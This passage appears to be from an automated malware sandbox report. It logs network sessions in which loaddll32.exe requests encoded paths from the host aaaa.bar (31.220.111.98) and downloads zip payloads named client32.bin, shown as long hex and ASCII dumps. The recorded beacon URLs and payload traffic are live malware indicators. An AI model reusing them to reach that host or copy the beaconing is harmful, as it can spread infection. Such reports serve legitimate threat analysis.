                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:12 UTC1188INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:12 UTC1204INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:12 UTC1220INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:12 UTC1236INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:13 UTC1252INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:13 UTC1268INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:13 UTC1284INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 f8 ac 01 36 31 ab 4a
                                                              Data Ascii: .dOeaYRm:J\o<l(Q<ywh^oQXf<&'&f &H1>.6Ra[.WH#>IrB4K)02>v7`1I-p\TvCPT=3baHcQhY$7JN^Ifi*g$ibyK]z/61J
                                                              2021-10-20 13:12:13 UTC1300INData Raw: 9a fa 62 32 5e b9 ab 85 b9 ab 50 c2 4a 8f c4 09 06 ae d5 bc 3a f3 8f f0 af d1 30 0b 9a cf 47 a5 60 5a 9d a6 b3 f3 db df 96 f0 20 0d a5 af d2 f4 64 bd 31 f5 be 5d f3 c5 fa 96 bb b3 a5 6d de cc 0b f5 bf 50 97 43 de 4f 1a 6d 46 32 20 ed 70 40 f0 8e 52 f1 9b a7 17 20 51 75 c9 52 f0 df 6f 73 c6 07 1d 2a 25 36 cb 2a 6f 45 b8 56 ed 01 4a f2 36 7a e4 02 b6 48 2f 27 9c 06 4a 19 1f 1d 07 33 7c 4d d9 28 2c 7d 74 84 5c 11 7c 58 97 9d 6a ab dd eb d2 6c d9 06 63 cc 3e 4a da c1 53 67 47 fc ef 52 94 5a 60 47 3b a9 3c 3b 31 a2 8e 39 86 a6 02 7d 89 e6 27 f4 64 49 f4 28 0e 30 dc 0c 71 0c 45 b0 da 9e ea 87 8e 11 ac 2c 22 ca 4e 8d 3f ae 3f 71 19 52 29 a0 82 9e 3b eb db c6 1e bf e9 4e b1 8b 87 d5 1f 14 a3 8a 84 41 34 77 05 fa 28 d8 dd ef 95 86 ec 0f 8d cb 65 0c f0 72 f7 2a fa
                                                              Data Ascii: b2^PJ:0G`Z d1]mPCOmF2 p@R QuRos*%6*oEVJ6zH/'J3|M(,}t\|Xjlc>JSgGRZ`G;<;19}'dI(0qE,"N??qR);NA4w(er*


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              18192.168.2.54996831.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:13 UTC1315OUTGET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
                                                              2021-10-20 13:12:14 UTC1315INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:13 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 1849
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:14 UTC1316INData Raw: 22 1f 12 32 d8 c6 ba 35 1b ff 2a a8 1c 15 83 72 b3 16 30 ce 8b f2 94 08 32 b5 de 35 dc 20 3e ac 5d 96 4d c1 42 3b eb 46 b9 92 bf 30 9f d0 97 f7 68 13 8c 4f ec d3 8c 98 37 3b 38 0c 51 23 b9 f0 b7 b7 68 ff 4b ce a9 e2 e3 0a fb e3 28 6e 38 b4 86 ed 03 1a b9 b3 8d e3 35 69 c2 0f bd f8 60 4a 2a ba b5 be 77 d8 2c 7e 54 ea b0 d2 c4 21 2c 2f 64 67 78 04 20 fb f5 b4 13 84 8f 93 92 a9 da b7 b0 d8 c4 f3 26 b2 9b 6b d4 41 a2 c0 2c 65 66 7d 01 c0 92 8f 3e be 38 e1 5d 3b d7 0f a8 6f 1f 17 e3 68 76 c4 94 df 75 68 dc cf b3 96 d9 68 a9 37 d4 9e 63 ee b1 03 af 8a 98 78 93 81 67 51 05 29 ae f7 06 1d 8d 12 90 f1 82 ea b8 3a bb 3b 1a 73 ab 17 ff bb 0a ba a1 e4 5b 0f 0d b8 1e 90 30 67 3c 7b 7f 44 09 be 0b ee fd 94 d7 8d fb 6a e7 6f b3 40 4c 70 ab fe 15 b8 b5 c7 e8 0d 01 1a 59
                                                              Data Ascii: "25*r025 >]MB;F0hO7;8Q#hK(n85i`J*w,~T!,/dgx &kA,ef}>8];ohvuhh7cxgQ):;s[0g<{Djo@LpY


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              19192.168.2.54996931.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:15 UTC1318OUTGET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: lang=en
                                                              2021-10-20 13:12:16 UTC1318INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:15 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 178758
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Set-Cookie: PHPSESSID=odtoci95m4hvgdsrbq2j2bach6; path=/; domain=.aaaa.bar
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:16 UTC1318INData Raw: 48 09 14 d8 bf b2 ec 04 c8 3f fb 4a d3 80 06 f0 bd 59 db e6 a5 dc 23 c3 c4 68 50 2b c5 72 6b 51 b9 b6 5d f6 b0 8c e5 6c 92 cd 4f eb 84 b9 2a 59 c3 36 e1 e6 ff 74 17 e2 17 9f 76 48 e1 10 c3 10 20 de 74 a3 61 05 3d 18 af ac d1 94 a7 dc dc 5f f5 ba 05 9e 73 7e 12 fb c3 d6 e6 b3 38 19 98 c6 03 29 3f e2 e7 9e 10 4f f5 6c 76 05 ad a2 46 50 82 ef cd d6 8c 0e b7 d4 7a 83 0b da 2d 3f 56 17 a1 34 c0 54 e5 30 ea 5b 21 4d d8 8f 21 be 07 db 0b 89 d7 cf 77 3b 02 38 71 1c 1f 9b 78 8e 6f 9b b0 e6 1c 94 9b b3 54 21 79 3e 7e 33 82 21 be 10 b5 61 81 24 d9 8a 08 f5 e7 50 bd 70 de 91 53 e6 73 d6 c6 19 5e 05 39 ca aa 07 24 5b aa 6c 8c 1d 89 d8 40 d1 82 e6 df 9e 85 6d c2 2a f3 5b 6b a5 60 05 cd cf 4f 2c bf c1 14 5d d9 66 4e 14 99 c2 6a 73 24 a6 b0 d9 6e 5b 0c a9 73 a8 5e db 86
                                                              Data Ascii: H?JY#hP+rkQ]lO*Y6tvH ta=_s~8)?OlvFPz-?V4T0[!M!w;8qxoT!y>~3!a$PpSs^9$[l@m*[k`O,]fNjs$n[s^
                                                              2021-10-20 13:12:16 UTC1334INData Raw: 9d 93 c7 ee a4 f6 76 97 81 b0 53 2e b9 4a d2 2e 0e d1 f0 42 c8 99 45 c3 4f 1b 82 3a 6c 44 b1 d0 4e 60 68 0f ca aa 59 27 0d 82 44 0f 0e d8 6c a5 f2 5a 2b 34 51 0c 9e c0 fe 2b 71 00 27 20 0e 37 af 8d a3 95 5f 9b 29 c9 d8 35 b8 2a 66 d5 20 3a 90 9c 22 7b b6 ab 88 6e 32 bd 60 33 05 b1 67 f0 a8 e4 ca 6d 9d 0e db 05 ea 8c cc aa 2a b6 75 21 e3 ac 76 51 cd be e0 2d d9 17 8b f7 c2 2d a6 66 e0 ad f0 fe d4 f9 06 9d 93 f2 9f e0 ab 3b 40 70 f7 be 38 ab b5 b6 ee f6 ee 83 bf 4c 8e d3 35 32 fd e9 f1 8d 4d ac 91 22 ad 48 0d 4e 9f 67 4d 93 75 8c 40 39 88 5f 8f c3 b6 ae c1 b3 77 07 58 4a 8e 45 b8 47 ae 5c de 2b ed eb 0d 10 0f ba a7 6a 62 62 23 12 29 2e 35 bb bc 51 44 0b ef 76 63 8f e0 b2 0f bc 50 7e 3e cb 02 20 8c 8d 42 4b 38 46 53 8e 6d f4 f8 e2 95 21 09 75 23 20 5f af b7
                                                              Data Ascii: vS.J.BEO:lDN`hY'DlZ+4Q+q' 7_)5*f :"{n2`3gm*u!vQ--f;@p8L52M"HNgMu@9_wXJEG\+jbb#).5QDvcP~> BK8FSm!u# _
                                                              2021-10-20 13:12:16 UTC1350INData Raw: 3e b5 30 97 fa 16 ce dc da ed f8 bb 1c b3 d7 33 42 62 26 04 50 c9 ae a2 8a d7 0c bd 59 fa 3d b7 94 9e e8 25 4b 9b 40 be 76 e8 3a ad 03 7f 12 a2 78 80 35 36 16 85 39 d8 c9 f0 3c 10 35 d3 2b 07 8d 44 02 38 bc e6 85 7c e7 8b b7 25 8b 79 c8 7a ee ee 1b cc 72 06 c8 2a e0 17 a1 c7 c5 41 68 75 09 b1 c5 32 0b 5e 03 01 f6 3b cc 77 07 e5 6f 4d 51 1b 95 cb 1d 16 30 1a 06 c1 a5 cd 08 a1 b6 f6 26 4e ba f8 a2 49 2c 1c 43 76 d1 a5 c5 47 99 6e 05 bd a7 1e c6 e6 03 94 f4 ad be 58 f1 71 89 43 63 13 8a 1e 32 e4 a8 18 93 ef 2e ba df ab e9 4a d2 fa d6 04 09 ea c4 5f 8b 7f 3d 5b 34 da 69 e0 c2 25 12 36 56 84 e8 0d c5 0c da eb 25 6e 41 a4 06 88 94 49 21 bb ee c0 23 70 60 51 b2 1c 2a 91 f0 36 d2 dc 76 ff c1 98 7d db 35 a6 03 f4 49 15 d9 c4 81 fd f6 5f 7d 0f 67 9e d1 54 05 f8 7f
                                                              Data Ascii: >03Bb&PY=%K@v:x569<5+D8|%yzr*Ahu2^;woMQ0&NI,CvGnXqCc2.J_=[4i%6V%nAI!#p`Q*6v}5I_}gT
                                                              2021-10-20 13:12:17 UTC1366INData Raw: 50 1e 0b ac 4a ce ee 01 c3 32 96 1b bd 04 f7 0a c8 3b 88 1e e6 d3 b0 de 5c b7 76 9f 20 66 82 13 55 7a 3e 5c cb 79 14 ab 5c fa 96 18 e5 67 d2 19 90 78 9f ee 30 8c f1 3f 2e d6 ec ba 9a 6b f8 da 05 d4 37 52 8b a3 0a 1a 19 05 0a e7 5a 88 00 8b 2a 36 08 41 f9 1b e9 97 d2 26 0c 97 de f7 ed c6 73 ab d5 8a 06 ef 27 be 0a 4e c3 0a e9 be 5a 6f ac a9 19 20 98 07 51 2b 13 07 36 be 09 b9 b7 41 1a 66 56 b6 b1 3a ac 8f cb 62 3b fa 4f 63 78 a8 29 6c 69 cf 83 6b a1 a1 d5 9f 98 f7 51 83 7c c3 25 cb 56 a3 1a ed 3c 71 bf 38 00 08 af db ca ee f7 a8 d4 e4 9d 6a c1 40 23 50 7b 4c 57 46 6b c0 32 7e c6 7f ed 56 ba 66 2f 2a cb e1 7e b2 be 9e 61 5c ec 0c f3 b4 44 15 72 4b 72 d5 74 52 32 24 1b 01 72 73 3a 2d cc 39 53 67 ce c3 46 2f b5 04 d2 76 50 fc 1f 74 13 2b 4b bf 91 37 05 27 c4
                                                              Data Ascii: PJ2;\v fUz>\y\gx0?.k7RZ*6A&s'NZo Q+6AfV:b;Ocx)likQ|%V<q8j@#P{LWFk2~Vf/*~a\DrKrtR2$rs:-9SgF/vPt+K7'
                                                              2021-10-20 13:12:17 UTC1382INData Raw: 14 89 b0 b4 78 16 cb 9a d1 b4 2b 9a 06 d1 06 1a 64 a3 10 4c ce 3a 8a 60 7c 73 b2 8b 7e 79 af a2 dc d1 6f 54 60 79 9f f4 96 38 4f 3b 0d 9e 31 ea c1 4b 1a c1 40 09 64 af 88 bc 54 18 ff 22 1f c7 04 06 86 79 fb 40 18 e4 1a 1f 36 a5 9e 94 ba 5f b7 60 6a 56 6a 8d 1c a6 41 53 d8 ca c6 a4 5a aa 51 ab a7 27 00 4d e4 3b e8 81 18 ba ea 8e 7c 6e 65 4d a1 a0 1c 3f bf 81 27 c8 85 c0 08 e9 ee 06 c9 47 cd a4 58 3c 71 b2 83 94 31 1c 7f a7 b3 c7 68 34 ff 5e 29 23 a3 8c a1 21 90 5b 3d 77 c6 bb 48 39 f2 a4 c2 e2 4f 7c 9d 9c 0c c3 9d fe 5c 92 64 89 a1 d0 fa a3 75 d7 55 4c 6a a7 d1 94 d1 8f 1c 3e a2 09 ac 7b 60 d0 83 ad 42 4e ab ec 59 29 0a 2a 1f e9 60 95 6c 49 ea 7a 2e 96 60 81 72 16 79 a5 4d 7e 07 06 45 08 e2 6c 71 c5 eb 61 b2 5a df 0a f4 6f e7 bc 9d 8d ea 30 3e 9a 93 94 da
                                                              Data Ascii: x+dL:`|s~yoT`y8O;1K@dT"y@6_`jVjASZQ'M;|neM?'GX<q1h4^)#![=wH9O|\duULj>{`BNY)*`lIz.`ryM~ElqaZo0>
                                                              2021-10-20 13:12:17 UTC1398INData Raw: b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08 dd 14 90 45 75 08 25 ed 73 d2 81 6d 12 83 b7 69 3f 61 14 79 65 db e6 0f 88 64 ea f0 54 e9 eb 31 05 70 d4 a0 5f a9 81 74 60 32 79 cd 93 54 32 09 45 9e 7b e7 12 05 3f b1 da b3 7a 35 5c 61 d6 43 6b ee 2f 39 9c 36 e7 db 22 cb aa f7 db 71 81 aa 8f 36 32 9d ea 04
                                                              Data Ascii: kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`oEu%smi?ayedT1p_t`2yT2E{?z5\aCk/96"q62
                                                              2021-10-20 13:12:17 UTC1414INData Raw: fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99 75 9d 62 8a 2b 40 95 20 fa b1 07 ae 20 d2 79 58 97 3a 01 cb 67 c5 61 e8 a0 3a b7 91 7a e4 de 6f 0e 67 7f 0b ba b4 43 63 12 a3 91 7e b2 0c 86 68 83 9a ec 19 98 b1 9f e8 39 50 b5 06 3e 1d 85 a3 c9 f5 ed fe b2 27 dd bd 52 a6 0e b9 ca e3 0c 42 0c e5 3d 29 83 63
                                                              Data Ascii: 39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<kub+@ yX:ga:zogCc~h9P>'RB=)c
                                                              2021-10-20 13:12:18 UTC1430INData Raw: 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd d2 e6 d6 f2 ba de 47 d3 cb 25 0d b2 0a 7e 6b f1 1c e6 81 33 c1 ef ae 35 8b 35 f4 a1 56 97 2f c6 5c 72 0b 1e 9d ef b1 8c 20 0a fe 42 f2 64 5c 0a 96 17 f8 e6 06 40 c1 fe 3d f2 fe e8 40 42 e0 a3 ee a5 99 9e 5e ea e1 53 5a 05 0a 63 50 73 58 e5 6f 13 d1 72 88 a1
                                                              Data Ascii: m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0G%~k355V/\r Bd\@=@B^SZcPsXor
